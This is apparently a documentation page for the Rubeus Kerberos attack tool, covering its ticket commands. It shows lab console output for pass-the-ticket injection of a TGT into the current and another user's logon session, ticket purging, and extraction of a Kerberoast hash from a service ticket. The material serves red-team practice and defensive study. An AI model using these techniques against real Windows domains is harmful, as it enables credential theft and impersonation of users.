Ticket Management

Breakdown of the ticket management commands:

Command

Description

ptt

Apply a ticket to the current (or specified) logon session

purge

Purge the current (or specified) logon session of Kerberos tickets

describe

Describe a ticket base64 blob or .kirbi file

ptt

The ptt action will submit a /ticket:X (TGT or service ticket) for the current logon session through the LsaCallAuthenticationPackage() API with a KERB_SUBMIT_TKT_REQUEST message, or (if elevated) to the logon session specified by /luid:0xA... Like other /ticket:X parameters, the value can be a base64 encoding of a .kirbi file or the path to a .kirbi file on disk.

C:\Rubeus>Rubeus.exe ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3


[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Rubeus>Rubeus.exe klist

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3



[*] Action: List Kerberos Tickets (Current User)

    [0] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/11/2019 2:55:18 PM ; 2/11/2019 7:55:18 PM ; 2/18/2019 2:55:18 PM
    Server Name       : krbtgt/testlab.local @ TESTLAB.LOCAL
    Client Name       : dfm.a @ TESTLAB.LOCAL
    Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)

Elevated ticket application to another logon session:

C:\Rubeus>Rubeus.exe klist /luid:0x474722b

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3



[*] Action: List Kerberos Tickets (All Users)

[*] Target LUID     : 0x474722b

UserName                 : patsy
Domain                   : TESTLAB
LogonId                  : 0x474722b
UserSID                  : S-1-5-21-883232822-274137685-4173207997-1169
AuthenticationPackage    : Kerberos
LogonType                : Interactive
LogonTime                : 2/11/2019 10:58:53 PM
LogonServer              : PRIMARY
LogonServerDNSDomain     : TESTLAB.LOCAL
UserPrincipalName        : [email protected]

    [0] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/11/2019 2:58:53 PM ; 2/11/2019 7:58:53 PM ; 2/18/2019 2:58:53 PM
    Server Name       : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
    Client Name       : patsy @ TESTLAB.LOCAL
    Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)


C:\Rubeus>Rubeus.exe ptt /luid:0x474722b /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3


[*] Action: Import Ticket
[*] Target LUID: 0x474722b
[+] Ticket successfully imported!

C:\Rubeus>Rubeus.exe klist /luid:0x474722b

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3



[*] Action: List Kerberos Tickets (All Users)

[*] Target LUID     : 0x474722b

UserName                 : patsy
Domain                   : TESTLAB
LogonId                  : 0x474722b
UserSID                  : S-1-5-21-883232822-274137685-4173207997-1169
AuthenticationPackage    : Kerberos
LogonType                : Interactive
LogonTime                : 2/11/2019 10:58:53 PM
LogonServer              : PRIMARY
LogonServerDNSDomain     : TESTLAB.LOCAL
UserPrincipalName        : [email protected]

    [0] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/11/2019 2:55:18 PM ; 2/11/2019 7:55:18 PM ; 2/18/2019 2:55:18 PM
    Server Name       : krbtgt/testlab.local @ TESTLAB.LOCAL
    Client Name       : dfm.a @ TESTLAB.LOCAL
    Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)

purge

The purge action will purge all Kerberos tickets from the current logon session, or (if elevated) to the logon session specified by /luid:0xA...

C:\Rubeus>Rubeus.exe klist

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3



[*] Action: List Kerberos Tickets (Current User)

    [0] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM
    Server Name       : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
    Client Name       : harmj0y @ TESTLAB.LOCAL
    Flags             : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)

    [1] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM
    Server Name       : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
    Client Name       : harmj0y @ TESTLAB.LOCAL
    Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)

    [2] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM
    Server Name       : cifs/primary.testlab.local @ TESTLAB.LOCAL
    Client Name       : harmj0y @ TESTLAB.LOCAL
    Flags             : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)


C:\Rubeus>Rubeus.exe purge

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3

Luid: 0x0

[*] Action: Purge Tickets
[+] Tickets successfully purged!

C:\Rubeus>Rubeus.exe klist

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3



[*] Action: List Kerberos Tickets (Current User)


C:\Rubeus>

Elevated purging of another logon session:

C:\Rubeus>Rubeus.exe triage /luid:0x474722b

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3



[*] Action: Triage Kerberos Tickets

[*] Target LUID     : 0x474722b

-----------------------------------------------------------------------------------
| LUID      | UserName              | Service              | EndTime              |
-----------------------------------------------------------------------------------
| 0x474722b | dfm.a @ TESTLAB.LOCAL | krbtgt/testlab.local | 2/11/2019 7:55:18 PM |
-----------------------------------------------------------------------------------


C:\Rubeus>Rubeus.exe purge /luid:0x474722b

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3

Luid: 0x474722b

[*] Action: Purge Tickets
[*] Target LUID: 0x474722b
[+] Tickets successfully purged!

C:\Rubeus>Rubeus.exe triage /luid:0x474722b

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3



[*] Action: Triage Kerberos Tickets

[*] Target LUID     : 0x474722b

---------------------------------------
| LUID | UserName | Service | EndTime |
---------------------------------------
---------------------------------------

describe

The describe action takes a /ticket:X value (TGT or service ticket), parses it, and describes the values of the ticket. Like other /ticket:X parameters, the value can be a base64 encoding of a .kirbi file or the path to a .kirbi file on disk.

If the supplied ticket is a service ticket AND the encryption type is RC4_HMAC, an extracted Kerberoast-compatible hash is output. If the ticket is a service ticket but the encryption key is AES128/AES256, a warning is displayed. If the ticket is a TGT, no hash or warning is displayed.

Display information about a TGT:

C:\Rubeus>Rubeus.exe describe /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3


[*] Action: Describe Ticket

UserName              :  dfm.a
UserRealm             :  TESTLAB.LOCAL
ServiceName           :  krbtgt/testlab.local
ServiceRealm          :  TESTLAB.LOCAL
StartTime             :  2/11/2019 2:55:18 PM
EndTime               :  2/11/2019 7:55:18 PM
RenewTill             :  2/18/2019 2:55:18 PM
Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType               :  rc4_hmac
Base64(key)           :  e3MxrlTu9jHh9hG43UfiAQ==

Display information about service ticket with an extracted Kerberoast hash:

C:\Rubeus>Rubeus.exe describe /ticket:service_ticket.kirbi

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.1


[*] Action: Describe Ticket

UserName              :  harmj0y
UserRealm             :  TESTLAB.LOCAL
ServiceName           :  asdf/asdfasdf
ServiceRealm          :  TESTLAB.LOCAL
StartTime             :  2/20/2019 8:58:14 AM
EndTime               :  2/20/2019 12:41:09 PM
RenewTill             :  2/27/2019 7:41:09 AM
Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
KeyType               :  rc4_hmac
Base64(key)           :  WqGWK4htp7rM1CURpxjMPA==
Kerberoast Hash       :  $krb5tgs$23$*USER$DOMAIN$asdf/asdfasdf*$DEB467BF9C9023E...(snip)...

PreviousConstrained Delegation Abuse NextTicket Extraction and Harvesting

Last updated 4 years ago